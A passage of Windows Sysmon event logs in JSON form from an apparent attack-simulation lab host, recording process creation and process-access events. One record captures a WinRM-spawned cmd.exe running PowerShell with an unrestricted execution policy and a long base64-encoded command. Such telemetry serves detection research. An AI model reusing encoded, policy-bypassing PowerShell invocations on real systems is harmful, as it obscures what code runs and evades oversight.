KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.509","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.524\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nParentProcessId: 484\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.524","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","ParentProcessId":"484","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.509\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nSourceProcessId: 484\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.509","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","SourceProcessId":"484","SourceThreadId":"2580","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010FFBD0700}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010FFBD0700}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 